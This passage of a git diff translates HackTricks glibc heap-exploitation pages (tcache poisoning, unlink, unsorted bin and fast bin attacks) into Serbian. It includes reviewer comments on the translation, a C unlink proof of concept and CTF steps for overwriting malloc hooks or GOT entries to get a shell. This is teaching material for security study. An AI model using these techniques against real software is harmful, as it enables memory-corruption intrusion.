Chunk 1-2-5-3 (free) ] [ 0xf0 Chunk 4 (corrupted) ] [ 0x400 Chunk defense ] +``` +- ```python +[ 0x200 Chunk 1 (free) ] [ 0x50 Chunk 2 ] [ 0x68 Chunk 5 (free) ] [ 0x1f8 Chunk 3 (free) ] [ 0xf0 Chunk 4 ] [ 0x400 Chunk defense ] +``` +- Zatim, alocira se `0x200` bajtova popunjavajući originalni chunk 1 +- I još `0x200` bajtova se alocira i chunk2 se uništava i stoga nema nikakvog curenja i ovo ne funkcioniše? 
Možda ovo ne bi trebalo raditi +- Zatim, alocira još jedan chunk sa 0x58 "a"s (prepisujući chunk2 i dosegnuvši chunk5) i modifikuje `fd` brzog bin chunk-a chunk5 tako da pokazuje na `__malloc_hook` +- Zatim, alocira se chunk od 0x68 tako da lažni brzi bin chunk u `__malloc_hook` bude sledeći brzi bin chunk +- Na kraju, alocira se novi brzi bin chunk od 0x68 i `__malloc_hook` se prepisuje sa adresom `one_gadget` {{#include ../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/libc-heap/overwriting-a-freed-chunk.md b/src/binary-exploitation/libc-heap/overwriting-a-freed-chunk.md index 117f462b6..f73776689 100644 --- a/src/binary-exploitation/libc-heap/overwriting-a-freed-chunk.md +++ b/src/binary-exploitation/libc-heap/overwriting-a-freed-chunk.md 
@@ -1,23 +1,23 @@ -# Overwriting a freed chunk +# Prepisivanje oslobođenog dela {{#include ../../banners/hacktricks-training.md}} -Several of the proposed heap exploitation techniques need to be able to overwrite pointers inside freed chunks. The goal of this page is to summarise the potential vulnerabilities that could grant this access: +Nekoliko predloženih tehnika eksploatacije heap-a treba da može da prepisuje pokazivače unutar oslobođenih delova. Cilj ove stranice je da sumira potencijalne ranjivosti koje bi mogle omogućiti ovaj pristup: -### Simple Use After Free +### Jednostavno korišćenje nakon oslobađanja -If it's possible for the attacker to **write info in a free chunk**, they could abuse this to overwrite the needed pointers. +Ako je moguće da napadač **upiše informacije u oslobođeni deo**, mogli bi to iskoristiti da prepišu potrebne pokazivače. -### Double Free +### Duplo oslobađanje -If the attacker can **`free` two times the same chunk** (free other chunks in between potentially) and make it be **2 times in the same bin**, it would be possible for the user to **allocate the chunk later**, **write the needed pointers** and then **allocate it again** triggering the actions of the chunk being allocated (e.g. fast bin attack, tcache attack...) +Ako napadač može da **`oslobađa` isti deo dva puta** (oslobađajući druge delove između potencijalno) i učini da bude **2 puta u istom kontejneru**, bilo bi moguće da korisnik **kasnije alocira deo**, **upiše potrebne pokazivače** i zatim **ponovo alocira**, pokrećući akcije delova koji se alociraju (npr. brzi bin napad, tcache napad...) -### Heap Overflow +### Prelivanje heap-a -It might be possible to **overflow an allocated chunk having next a freed chunk** and modify some headers/pointers of it. +Moglo bi biti moguće **preliti alocirani deo koji ima pored oslobođeni deo** i izmeniti neke zaglavlja/pokazivače. 
-### Off-by-one overflow +### Prelivanje sa pomerajem od jedan -In this case it would be possible to **modify the size** of the following chunk in memory. An attacker could abuse this to **make an allocated chunk have a bigger size**, then **`free`** it, making the chunk been **added to a bin of a different** size (bigger), then allocate the **fake size**, and the attack will have access to a **chunk with a size which is bigger** than it really is, **granting therefore an overlapping chunks situation**, which is exploitable the same way to a **heap overflow** (check previous section). +U ovom slučaju bi bilo moguće **izmeniti veličinu** sledećeg dela u memoriji. Napadač bi mogao to iskoristiti da **napravi alocirani deo sa većom veličinom**, zatim **`oslobađa`** ga, čineći da deo bude **dodato u kontejner druge** veličine (veće), zatim alocirati **lažnu veličinu**, i napad će imati pristup **delu sa veličinom koja je veća** nego što zaista jeste, **omogućavajući tako situaciju preklapanja delova**, koja se može iskoristiti na isti način kao **prelivanje heap-a** (proverite prethodni odeljak). {{#include ../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/libc-heap/tcache-bin-attack.md b/src/binary-exploitation/libc-heap/tcache-bin-attack.md index 7c69db95c..9824d1d21 100644 --- a/src/binary-exploitation/libc-heap/tcache-bin-attack.md +++ b/src/binary-exploitation/libc-heap/tcache-bin-attack.md 
@@ -2,46 +2,46 @@ {{#include ../../banners/hacktricks-training.md}} -## Basic Information +## Osnovne informacije -For more information about what is a Tcache bin check this page: +Za više informacija o tome šta je Tcache bin, proverite ovu stranicu: {{#ref}} bins-and-memory-allocations.md {{#endref}} -First of all, note that the Tcache was introduced in Glibc version 2.26. +Prvo, imajte na umu da je Tcache uveden u Glibc verziji 2.26. -The **Tcache attack** (also known as **Tcache poisoning**) proposed in the [**guyinatuxido page**](https://guyinatuxedo.github.io/29-tcache/tcache_explanation/index.html) is very similar to the fast bin attack where the goal is to overwrite the pointer to the next chunk in the bin inside a freed chunk to an arbitrary address so later it's possible to **allocate that specific address and potentially overwrite pointes**. +**Tcache napad** (poznat i kao **Tcache trovanje**) predložen na [**guyinatuxido stranici**](https://guyinatuxedo.github.io/29-tcache/tcache_explanation/index.html) je veoma sličan fast bin napadu gde je cilj prepisati pokazivač na sledeći deo u binu unutar oslobođenog dela na proizvoljnu adresu kako bi kasnije bilo moguće **alokovati tu specifičnu adresu i potencijalno prepisati pokazivače**. -However, nowadays, if you run the mentioned code you will get the error: **`malloc(): unaligned tcache chunk detected`**. So, it's needed to write as address in the new pointer an aligned address (or execute enough times the binary so the written address is actually aligned). +Međutim, danas, ako pokrenete pomenuti kod dobićete grešku: **`malloc(): unaligned tcache chunk detected`**. Dakle, potrebno je napisati kao adresu u novom pokazivaču usklađenu adresu (ili izvršiti binarni kod dovoljno puta tako da je napisana adresa zapravo usklađena). 
-### Tcache indexes attack +### Tcache indeksi napad -Usually it's possible to find at the beginning of the heap a chunk containing the **amount of chunks per index** inside the tcache and the address to the **head chunk of each tcache index**. If for some reason it's possible to modify this information, it would be possible to **make the head chunk of some index point to a desired address** (like `__malloc_hook`) to then allocated a chunk of the size of the index and overwrite the contents of `__malloc_hook` in this case. +Obično je moguće pronaći na početku heap-a deo koji sadrži **broj delova po indeksu** unutar tcache-a i adresu do **glavnog dela svakog tcache indeksa**. Ako iz nekog razloga bude moguće izmeniti ove informacije, bilo bi moguće **naterati glavni deo nekog indeksa da pokazuje na željenu adresu** (kao što je `__malloc_hook`) kako bi se zatim alokovao deo veličine indeksa i prepisali sadržaji `__malloc_hook` u ovom slučaju. -## Examples +## Primeri - CTF [https://guyinatuxedo.github.io/29-tcache/dcquals19_babyheap/index.html](https://guyinatuxedo.github.io/29-tcache/dcquals19_babyheap/index.html) - - **Libc info leak**: It's possible to fill the tcaches, add a chunk into the unsorted list, empty the tcache and **re-allocate the chunk from the unsorted bin** only overwriting the first 8B, leaving the **second address to libc from the chunk intact so we can read it**. - - **Tcache attack**: The binary is vulnerable a 1B heap overflow. This will be abuse to change the **size header** of an allocated chunk making it bigger. Then, this chunk will be **freed**, adding it to the tcache of chunks of the fake size. 
Then, we will allocate a chunk with the faked size, and the previous chunk will be **returned knowing that this chunk was actually smaller** and this grants up the opportunity to **overwrite the next chunk in memory**.\ - We will abuse this to **overwrite the next chunk's FD pointer** to point to **`malloc_hook`**, so then its possible to alloc 2 pointers: first the legit pointer we just modified, and then the second allocation will return a chunk in **`malloc_hook`** that it's possible to abuse to write a **one gadget**. +- **Libc info leak**: Moguće je napuniti tcache, dodati deo u nesortiranu listu, isprazniti tcache i **ponovo alocirati deo iz nesortiranog bina** samo prepisujući prvih 8B, ostavljajući **drugom adresom do libc iz dela netaknutu kako bismo mogli da je pročitamo**. +- **Tcache napad**: Binarni kod je ranjiv na 1B heap overflow. Ovo će se iskoristiti da se promeni **header veličine** alociranog dela čineći ga većim. Zatim, ovaj deo će biti **oslobođen**, dodajući ga u tcache delova lažne veličine. Zatim ćemo alocirati deo sa lažnom veličinom, a prethodni deo će biti **vraćen znajući da je ovaj deo zapravo manji** i to pruža priliku da **prepišemo sledeći deo u memoriji**.\ +Iskoristićemo ovo da **prepišemo FD pokazivač sledećeg dela** da pokazuje na **`malloc_hook`**, tako da je moguće alocirati 2 pokazivača: prvo legitiman pokazivač koji smo upravo izmenili, a zatim će druga alokacija vratiti deo u **`malloc_hook`** koji je moguće iskoristiti za pisanje **one gadget**. - CTF [https://guyinatuxedo.github.io/29-tcache/plaid19_cpp/index.html](https://guyinatuxedo.github.io/29-tcache/plaid19_cpp/index.html) - - **Libc info leak**: There is a use after free and a double free. In this writeup the author leaked an address of libc by readnig the address of a chunk placed in a small bin (like leaking it from the unsorted bin but from the small one) - - **Tcache attack**: A Tcache is performed via a **double free**. 
The same chunk is freed twice, so inside the Tcache the chunk will point to itself. Then, it's allocated, its FD pointer is modified to point to the **free hook** and then it's allocated again so the next chunk in the list is going to be in the free hook. Then, this is also allocated and it's possible to write a the address of `system` here so when a malloc containing `"/bin/sh"` is freed we get a shell. +- **Libc info leak**: Postoji korišćenje nakon oslobađanja i dvostruko oslobađanje. U ovom izveštaju autor je otkrio adresu libc čitajući adresu dela smeštenog u malom binu (kao da je otkrio iz nesortiranog bina, ali iz malog). +- **Tcache napad**: Tcache se vrši putem **dvostrukog oslobađanja**. Isti deo se oslobađa dva puta, tako da unutar Tcache-a deo pokazuje na sebe. Zatim se alocira, njegov FD pokazivač se menja da pokazuje na **free hook** i zatim se ponovo alocira tako da će sledeći deo na listi biti u free hook-u. Zatim se ovo takođe alocira i moguće je ovde napisati adresu `system` tako da kada se oslobodi malloc koji sadrži `"/bin/sh"` dobijamo shell. - CTF [https://guyinatuxedo.github.io/44-more_tcache/csaw19_popping_caps0/index.html](https://guyinatuxedo.github.io/44-more_tcache/csaw19_popping_caps0/index.html) - - The main vuln here is the capacity to `free` any address in the heap by indicating its offset - - **Tcache indexes attack**: It's possible to allocate and free a chunk of a size that when stored inside the tcache chunk (the chunk with the info of the tcache bins) will generate an **address with the value 0x100**. This is because the tcache stores the amount of chunks on each bin in different bytes, therefore one chunk in one specific index generates the value 0x100. - - Then, this value looks like there is a chunk of size 0x100. Allowing to abuse it by `free` this address. This will **add that address to the index of chunks of size 0x100 in the tcache**. 
- - Then, **allocating** a chunk of size **0x100**, the previous address will be returned as a chunk, allowing to overwrite other tcache indexes.\ - For example putting the address of malloc hook in one of them and allocating a chunk of the size of that index will grant a chunk in calloc hook, which allows for writing a one gadget to get a s shell. +- Glavna ranjivost ovde je sposobnost da se `free` bilo koja adresa u heap-u ukazivanjem na njen offset. +- **Tcache indeksi napad**: Moguće je alocirati i osloboditi deo veličine koja kada se čuva unutar tcache dela (deo sa informacijama o tcache binovima) generiše **adresu sa vrednošću 0x100**. Ovo je zato što tcache čuva broj delova u svakom binu u različitim bajtovima, stoga jedan deo u jednom specifičnom indeksu generiše vrednost 0x100. +- Zatim, ova vrednost izgleda kao da postoji deo veličine 0x100. Omogućavajući da se iskoristi tako što se `free` ova adresa. Ovo će **dodati tu adresu u indeks delova veličine 0x100 u tcache**. +- Zatim, **alokacija** dela veličine **0x100**, prethodna adresa će biti vraćena kao deo, omogućavajući prepisivanje drugih tcache indeksa.\ +Na primer, stavljajući adresu malloc hook u jedan od njih i alocirajući deo veličine tog indeksa dobićemo deo u calloc hook-u, što omogućava pisanje one gadget za dobijanje shell-a. - CTF [https://guyinatuxedo.github.io/44-more_tcache/csaw19_popping_caps1/index.html](https://guyinatuxedo.github.io/44-more_tcache/csaw19_popping_caps1/index.html) - - Same vulnerability as before with one extra restriction - - **Tcache indexes attack**: Similar attack to the previous one but using less steps by **freeing the chunk that contains the tcache info** so it's address is added to the tcache index of its size so it's possible to allocate that size and get the tcache chunk info as a chunk, which allows to add free hook as the address of one index, alloc it, and write a one gadget on it. +- Ista ranjivost kao pre sa jednom dodatnom restrikcijom. 
+- **Tcache indeksi napad**: Sličan napad kao prethodni, ali koristeći manje koraka oslobađanjem dela koji sadrži tcache informacije tako da se njegova adresa dodaje u tcache indeks njegove veličine, tako da je moguće alocirati tu veličinu i dobiti tcache informacije kao deo, što omogućava dodavanje free hook kao adresu jednog indeksa, alocirati ga i napisati one gadget na njemu. - [**Math Door. HTB Cyber Apocalypse CTF 2023**](https://7rocky.github.io/en/ctf/other/htb-cyber-apocalypse/math-door/) - - **Write After Free** to add a number to the `fd` pointer. - - A lot of **heap feng-shui** is needed in this challenge. The writeup shows how **controlling the head of the Tcache** free-list is pretty handy. - - **Glibc leak** through `stdout` (FSOP). - - **Tcache poisoning** to get an arbitrary write primitive. +- **Write After Free** da se doda broj u `fd` pokazivač. +- Puno **heap feng-shui** je potrebno u ovom izazovu. Izveštaj pokazuje kako je **kontrola glave Tcache** free-liste veoma korisna. +- **Glibc leak** kroz `stdout` (FSOP). +- **Tcache trovanje** za dobijanje proizvoljne write primitive. {{#include ../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/libc-heap/unlink-attack.md b/src/binary-exploitation/libc-heap/unlink-attack.md index 959ff36db..a823a48eb 100644 --- a/src/binary-exploitation/libc-heap/unlink-attack.md +++ b/src/binary-exploitation/libc-heap/unlink-attack.md @@ -2,16 +2,15 @@ {{#include ../../banners/hacktricks-training.md}} -## Basic Information +## Osnovne Informacije -When this attack was discovered it mostly allowed a WWW (Write What Where), however, some **checks were added** making the new version of the attack more interesting more more complex and **useless**. +Kada je ovaj napad otkriven, uglavnom je omogućavao WWW (Write What Where), međutim, neki **provere su dodate** čineći novu verziju napada zanimljivijom, složenijom i **beskorisnom**. -### Code Example: +### Primer Koda:
-Code - +Kod ```c #include #include 
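Review bot: heading capitalisation in this hunk is inconsistent with the rest of the commit: `+## Osnovne Informacije` and `+### Primer Koda:` use title case, while `tcache-bin-attack.md` has `+## Osnovne informacije` and `off-by-one-overflow.md` has `+### Primer koda:`; use sentence case throughout. Grammar: `neki **provere su dodate**` should be `neke **provere su dodate**` (`provera` is feminine). The `-Code` / `+Kod` change also drops the blank line that sat between that summary text and the ```c fence (hunk header `-2,16 +2,15`); a fence directly after a non-blank line can render differently, so keep the blank line and limit the hunk to the translation.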
@@ -21,109 +20,108 @@ When this attack was discovered it mostly allowed a WWW (Write What Where), howe // Altered from https://github.com/DhavalKapil/heap-exploitation/tree/d778318b6a14edad18b20421f5a06fa1a6e6920e/assets/files/unlink_exploit.c to make it work struct chunk_structure { - size_t prev_size; - size_t size; - struct chunk_structure *fd; - struct chunk_structure *bk; - char buf[10]; // padding +size_t prev_size; +size_t size; +struct chunk_structure *fd; +struct chunk_structure *bk; +char buf[10]; // padding }; int main() { - unsigned long long *chunk1, *chunk2; - struct chunk_structure *fake_chunk, *chunk2_hdr; - char data[20]; +unsigned long long *chunk1, *chunk2; +struct chunk_structure *fake_chunk, *chunk2_hdr; +char data[20]; - // First grab two chunks (non fast) - chunk1 = malloc(0x8000); - chunk2 = malloc(0x8000); - printf("Stack pointer to chunk1: %p\n", &chunk1); - printf("Chunk1: %p\n", chunk1); - printf("Chunk2: %p\n", chunk2); +// First grab two chunks (non fast) +chunk1 = malloc(0x8000); +chunk2 = malloc(0x8000); +printf("Stack pointer to chunk1: %p\n", &chunk1); +printf("Chunk1: %p\n", chunk1); +printf("Chunk2: %p\n", chunk2); - // Assuming attacker has control over chunk1's contents - // Overflow the heap, override chunk2's header +// Assuming attacker has control over chunk1's contents +// Overflow the heap, override chunk2's header - // First forge a fake chunk starting at chunk1 - // Need to setup fd and bk pointers to pass the unlink security check - fake_chunk = (struct chunk_structure *)chunk1; - fake_chunk->size = 0x8000; - fake_chunk->fd = (struct chunk_structure *)(&chunk1 - 3); // Ensures P->fd->bk == P - fake_chunk->bk = (struct chunk_structure *)(&chunk1 - 2); // Ensures P->bk->fd == P +// First forge a fake chunk starting at chunk1 +// Need to setup fd and bk pointers to pass the unlink security check +fake_chunk = (struct chunk_structure *)chunk1; +fake_chunk->size = 0x8000; +fake_chunk->fd = (struct chunk_structure *)(&chunk1 
- 3); // Ensures P->fd->bk == P +fake_chunk->bk = (struct chunk_structure *)(&chunk1 - 2); // Ensures P->bk->fd == P - // Next modify the header of chunk2 to pass all security checks - chunk2_hdr = (struct chunk_structure *)(chunk2 - 2); - chunk2_hdr->prev_size = 0x8000; // chunk1's data region size - chunk2_hdr->size &= ~1; // Unsetting prev_in_use bit +// Next modify the header of chunk2 to pass all security checks +chunk2_hdr = (struct chunk_structure *)(chunk2 - 2); +chunk2_hdr->prev_size = 0x8000; // chunk1's data region size +chunk2_hdr->size &= ~1; // Unsetting prev_in_use bit - // Now, when chunk2 is freed, attacker's fake chunk is 'unlinked' - // This results in chunk1 pointer pointing to chunk1 - 3 - // i.e. chunk1[3] now contains chunk1 itself. - // We then make chunk1 point to some victim's data - free(chunk2); - printf("Chunk1: %p\n", chunk1); - printf("Chunk1[3]: %x\n", chunk1[3]); +// Now, when chunk2 is freed, attacker's fake chunk is 'unlinked' +// This results in chunk1 pointer pointing to chunk1 - 3 +// i.e. chunk1[3] now contains chunk1 itself. +// We then make chunk1 point to some victim's data +free(chunk2); +printf("Chunk1: %p\n", chunk1); +printf("Chunk1[3]: %x\n", chunk1[3]); - chunk1[3] = (unsigned long long)data; +chunk1[3] = (unsigned long long)data; - strcpy(data, "Victim's data"); +strcpy(data, "Victim's data"); - // Overwrite victim's data using chunk1 - chunk1[0] = 0x002164656b636168LL; +// Overwrite victim's data using chunk1 +chunk1[0] = 0x002164656b636168LL; - printf("%s\n", data); +printf("%s\n", data); - return 0; +return 0; } ``` -
-- Attack doesn't work if tcaches are used (after 2.26) +- Napad ne funkcioniše ako se koriste tcaches (posle 2.26) -### Goal +### Cilj -This attack allows to **change a pointer to a chunk to point 3 addresses before of itself**. If this new location (surroundings of where the pointer was located) has interesting stuff, like other controllable allocations / stack..., it's possible to read/overwrite them to cause a bigger harm. +Ovaj napad omogućava da **promenite pokazivač na deo da pokazuje 3 adrese pre sebe**. Ako se ova nova lokacija (okolina gde je pokazivač bio smešten) sadrži zanimljive stvari, kao što su druge kontrolisane alokacije / stek..., moguće je pročitati/prepisati ih kako bi se izazvala veća šteta. -- If this pointer was located in the stack, because it's now pointing 3 address before itself and the user potentially can read it and modify it, it will be possible to leak sensitive info from the stack or even modify the return address (maybe) without touching the canary -- In order CTF examples, this pointer is located in an array of pointers to other allocations, therefore, making it point 3 address before and being able to read and write it, it's possible to make the other pointers point to other addresses.\ - As potentially the user can read/write also the other allocations, he can leak information or overwrite new address in arbitrary locations (like in the GOT). +- Ako je ovaj pokazivač bio smešten u steku, pošto sada pokazuje 3 adrese pre sebe i korisnik potencijalno može da ga pročita i izmeni, biće moguće da se otkriju osetljive informacije iz steka ili čak izmeni adresa povratka (možda) bez dodirivanja kanarija. 
+- U skladu sa CTF primerima, ovaj pokazivač se nalazi u nizu pokazivača na druge alokacije, stoga, čineći ga da pokazuje 3 adrese pre i imajući mogućnost da ga pročita i piše, moguće je učiniti da drugi pokazivači pokazuju na druge adrese.\ +Pošto korisnik potencijalno može da čita/piše i druge alokacije, može otkriti informacije ili prepisati nove adrese na proizvoljnim lokacijama (kao u GOT-u). -### Requirements +### Zahtevi -- Some control in a memory (e.g. stack) to create a couple of chunks giving values to some of the attributes. -- Stack leak in order to set the pointers of the fake chunk. +- Neka kontrola u memoriji (npr. stek) da se kreira nekoliko delova dodeljujući vrednosti nekim od atributa. +- Otkriće steka kako bi se postavili pokazivači lažnog dela. -### Attack +### Napad -- There are a couple of chunks (chunk1 and chunk2) -- The attacker controls the content of chunk1 and the headers of chunk2. -- In chunk1 the attacker creates the structure of a fake chunk: - - To bypass protections he makes sure that the field `size` is correct to avoid the error: `corrupted size vs. prev_size while consolidating` - - and fields `fd` and `bk` of the fake chunk are pointing to where chunk1 pointer is stored in the with offsets of -3 and -2 respectively so `fake_chunk->fd->bk` and `fake_chunk->bk->fd` points to position in memory (stack) where the real chunk1 address is located: +- Postoji nekoliko delova (chunk1 i chunk2) +- Napadač kontroliše sadržaj chunk1 i zaglavlja chunk2. +- U chunk1 napadač kreira strukturu lažnog dela: +- Da bi zaobišao zaštite, osigurava da je polje `size` ispravno kako bi izbegao grešku: `corrupted size vs. prev_size while consolidating` +- i polja `fd` i `bk` lažnog dela pokazuju na mesto gde je pokazivač chunk1 smešten sa offsetima -3 i -2, respektivno, tako da `fake_chunk->fd->bk` i `fake_chunk->bk->fd` pokazuju na poziciju u memoriji (stek) gde se nalazi prava adresa chunk1:

https://heap-exploitation.dhavalkapil.com/attacks/unlink_exploit

-- The headers of the chunk2 are modified to indicate that the previous chunk is not used and that the size is the size of the fake chunk contained. -- When the second chunk is freed then this fake chunk is unlinked happening: - - `fake_chunk->fd->bk` = `fake_chunk->bk` - - `fake_chunk->bk->fd` = `fake_chunk->fd` -- Previously it was made that `fake_chunk->fd->bk` and `fake_chunk->bk->fd` point to the same place (the location in the stack where `chunk1` was stored, so it was a valid linked list). As **both are pointing to the same location** only the last one (`fake_chunk->bk->fd = fake_chunk->fd`) will take **effect**. -- This will **overwrite the pointer to chunk1 in the stack to the address (or bytes) stored 3 addresses before in the stack**. - - Therefore, if an attacker could control the content of the chunk1 again, he will be able to **write inside the stack** being able to potentially overwrite the return address skipping the canary and modify the values and points of local variables. Even modifying again the address of chunk1 stored in the stack to a different location where if the attacker could control again the content of chunk1 he will be able to write anywhere. - - Note that this was possible because the **addresses are stored in the stack**. The risk and exploitation might depend on **where are the addresses to the fake chunk being stored**. +- Zaglavlja chunk2 su modifikovana da označe da prethodni deo nije korišćen i da je veličina veličina sadržanog lažnog dela. +- Kada se drugi deo oslobodi, tada se ovaj lažni deo unlink-uje, dešavajući se: +- `fake_chunk->fd->bk` = `fake_chunk->bk` +- `fake_chunk->bk->fd` = `fake_chunk->fd` +- Prethodno je napravljeno da `fake_chunk->fd->bk` i `fake_chunk->bk->fd` pokazuju na isto mesto (lokaciju u steku gde je `chunk1` bio smešten, tako da je to bila validna povezana lista). Pošto **oba pokazuju na istu lokaciju**, samo će poslednji (`fake_chunk->bk->fd = fake_chunk->fd`) imati **efekat**. 
+- Ovo će **prepisati pokazivač na chunk1 u steku na adresu (ili bajtove) smeštene 3 adrese pre u steku**. +- Stoga, ako bi napadač mogao ponovo da kontroliše sadržaj chunk1, moći će da **piše unutar steka**, potencijalno prepisujući adresu povratka preskočivši kanarija i menjajući vrednosti i pokazivače lokalnih promenljivih. Čak i ponovo menjajući adresu chunk1 smeštenu u steku na drugu lokaciju gde, ako bi napadač ponovo mogao da kontroliše sadržaj chunk1, mogao bi da piše bilo gde. +- Imajte na umu da je ovo bilo moguće jer su **adrese smeštene u steku**. Rizik i eksploatacija mogu zavisiti od **gde su adrese lažnog dela smeštene**.

https://heap-exploitation.dhavalkapil.com/attacks/unlink_exploit

-## References +## Reference - [https://heap-exploitation.dhavalkapil.com/attacks/unlink_exploit](https://heap-exploitation.dhavalkapil.com/attacks/unlink_exploit) -- Although it would be weird to find an unlink attack even in a CTF here you have some writeups where this attack was used: - - CTF example: [https://guyinatuxedo.github.io/30-unlink/hitcon14_stkof/index.html](https://guyinatuxedo.github.io/30-unlink/hitcon14_stkof/index.html) - - In this example, instead of the stack there is an array of malloc'ed addresses. The unlink attack is performed to be able to allocate a chunk here, therefore being able to control the pointers of the array of malloc'ed addresses. Then, there is another functionality that allows to modify the content of chunks in these addresses, which allows to point addresses to the GOT, modify function addresses to egt leaks and RCE. - - Another CTF example: [https://guyinatuxedo.github.io/30-unlink/zctf16_note2/index.html](https://guyinatuxedo.github.io/30-unlink/zctf16_note2/index.html) - - Just like in the previous example, there is an array of addresses of allocations. It's possible to perform an unlink attack to make the address to the first allocation point a few possitions before starting the array and the overwrite this allocation in the new position. Therefore, it's possible to overwrite pointers of other allocations to point to GOT of atoi, print it to get a libc leak, and then overwrite atoi GOT with the address to a one gadget. - - CTF example with custom malloc and free functions that abuse a vuln very similar to the unlink attack: [https://guyinatuxedo.github.io/33-custom_misc_heap/csaw17_minesweeper/index.html](https://guyinatuxedo.github.io/33-custom_misc_heap/csaw17_minesweeper/index.html) - - There is an overflow that allows to control the FD and BK pointers of custom malloc that will be (custom) freed. 
Moreover, the heap has the exec bit, so it's possible to leak a heap address and point a function from the GOT to a heap chunk with a shellcode to execute. +- Iako bi bilo čudno pronaći unlink napad čak i u CTF-u, ovde imate nekoliko pisanih izveštaja gde je ovaj napad korišćen: +- CTF primer: [https://guyinatuxedo.github.io/30-unlink/hitcon14_stkof/index.html](https://guyinatuxedo.github.io/30-unlink/hitcon14_stkof/index.html) +- U ovom primeru, umesto steka, postoji niz malloc'ovanih adresa. Unlink napad se vrši kako bi se ovde alocirao deo, stoga se može kontrolisati pokazivače niza malloc'ovanih adresa. Zatim, postoji još jedna funkcionalnost koja omogućava modifikaciju sadržaja delova u ovim adresama, što omogućava da se adrese usmere na GOT, modifikuju adrese funkcija za dobijanje leak-ova i RCE. +- Još jedan CTF primer: [https://guyinatuxedo.github.io/30-unlink/zctf16_note2/index.html](https://guyinatuxedo.github.io/30-unlink/zctf16_note2/index.html) +- Baš kao u prethodnom primeru, postoji niz adresa alokacija. Moguće je izvršiti unlink napad kako bi se adresa prve alokacije usmerila nekoliko pozicija pre početka niza i prepisala ovu alokaciju na novoj poziciji. Stoga, moguće je prepisati pokazivače drugih alokacija da pokazuju na GOT funkcije atoi, ispisati je da bi se dobio libc leak, a zatim prepisati atoi GOT sa adresom jednog gadgeta. +- CTF primer sa prilagođenim malloc i free funkcijama koje zloupotrebljavaju ranjivost vrlo sličnu unlink napadu: [https://guyinatuxedo.github.io/33-custom_misc_heap/csaw17_minesweeper/index.html](https://guyinatuxedo.github.io/33-custom_misc_heap/csaw17_minesweeper/index.html) +- Postoji overflow koji omogućava kontrolu FD i BK pokazivača prilagođenog malloc-a koji će biti (prilagođeni) oslobođeni. Štaviše, heap ima exec bit, tako da je moguće otkriti adresu heap-a i usmeriti funkciju iz GOT-a na heap deo sa shellcode-om za izvršavanje. {{#include ../../banners/hacktricks-training.md}} 
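Review bot: the nested bullets under "U chunk1 napadač kreira strukturu lažnog dela:" lose their indentation on the translated lines (the source's indented `- To bypass protections ...` and `- and fields fd and bk ...` come back as top-level `+- Da bi zaobišao ...` / `+- i polja fd i bk ...`), so the sub-steps that explain how the fake chunk is built now read as siblings of the step they belong to; the same flattening hits the nested CTF notes under `### Reference` and the C lines inside the code fence, where every `-` line still carries its leading whitespace and every `+` line (`+chunk2_hdr = (struct chunk_structure *)(chunk2 - 2);`) has none. Restore the original indentation on the `+` lines so the Markdown nesting and the listing match the English page. Two wording slips while you are there: "U skladu sa CTF primerima" renders the source's "In order CTF examples" (a typo for "other") as "in accordance with", where "U drugim CTF primerima" is meant, and "Ako se ova nova lokacija ... sadrži" should drop the reflexive "se".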
diff --git a/src/binary-exploitation/libc-heap/unsorted-bin-attack.md b/src/binary-exploitation/libc-heap/unsorted-bin-attack.md index 65d509c48..7d1775b79 100644 --- a/src/binary-exploitation/libc-heap/unsorted-bin-attack.md +++ b/src/binary-exploitation/libc-heap/unsorted-bin-attack.md 
@@ -4,70 +4,70 @@ ## Basic Information -For more information about what is an unsorted bin check this page: +Za više informacija o tome šta je unsorted bin, pogledajte ovu stranicu: {{#ref}} bins-and-memory-allocations.md {{#endref}} -Unsorted lists are able to write the address to `unsorted_chunks (av)` in the `bk` address of the chunk. Therefore, if an attacker can **modify the address of the `bk` pointer** in a chunk inside the unsorted bin, he could be able to **write that address in an arbitrary address** which could be helpful to leak a Glibc addresses or bypass some defense. +Unsorted liste mogu da upisuju adresu u `unsorted_chunks (av)` u `bk` adresu chunk-a. Stoga, ako napadač može da **modifikuje adresu `bk` pokazivača** u chunk-u unutar unsorted bin-a, mogao bi da **upisuje tu adresu u proizvoljnu adresu** što bi moglo biti korisno za otkrivanje Glibc adresa ili zaobići neku od odbrana. -So, basically, this attack allows to **set a big number at an arbitrary address**. This big number is an address, which could be a heap address or a Glibc address. A typical target is **`global_max_fast`** to allow to create fast bin bins with bigger sizes (and pass from an unsorted bin atack to a fast bin attack). +Dakle, u suštini, ovaj napad omogućava da se **postavi velika brojka na proizvoljnu adresu**. Ova velika brojka je adresa, koja može biti adresa heap-a ili Glibc adresa. Tipičan cilj je **`global_max_fast`** kako bi se omogućilo kreiranje fast bin bin-ova sa većim veličinama (i prelazak iz unsorted bin napada u fast bin napad). > [!TIP] -> T> aking a look to the example provided in [https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/unsorted_bin_attack/#principle](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/unsorted_bin_attack/#principle) and using 0x4000 and 0x5000 instead of 0x400 and 0x500 as chunk sizes (to avoid Tcache) it's possible to see that **nowadays** the error **`malloc(): unsorted double linked list corrupted`** is triggered. 
+> P>ogledajte primer dat u [https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/unsorted_bin_attack/#principle](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/unsorted_bin_attack/#principle) i koristeći 0x4000 i 0x5000 umesto 0x400 i 0x500 kao veličine chunk-ova (da bi se izbegao Tcache) moguće je videti da **danas** greška **`malloc(): unsorted double linked list corrupted`** se aktivira. > -> Therefore, this unsorted bin attack now (among other checks) also requires to be able to fix the doubled linked list so this is bypassed `victim->bk->fd == victim` or not `victim->fd == av (arena)`, which means that the address where we want to write must have the address of the fake chunk in its `fd` position and that the fake chunk `fd` is pointing to the arena. +> Stoga, ovaj unsorted bin napad sada (pored drugih provera) takođe zahteva da se može popraviti dvostruko povezani spisak tako da se zaobiđe `victim->bk->fd == victim` ili ne `victim->fd == av (arena)`, što znači da adresa na koju želimo da pišemo mora imati adresu lažnog chunk-a u svom `fd` položaju i da lažni chunk `fd` pokazuje na arenu. > [!CAUTION] -> Note that this attack corrupts the unsorted bin (hence small and large too). So we can only **use allocations from the fast bin now** (a more complex program might do other allocations and crash), and to trigger this we must **allocate the same size or the program will crash.** +> Imajte na umu da ovaj napad korumpira unsorted bin (takođe mali i veliki). Dakle, možemo samo **koristiti alokacije iz fast bin-a 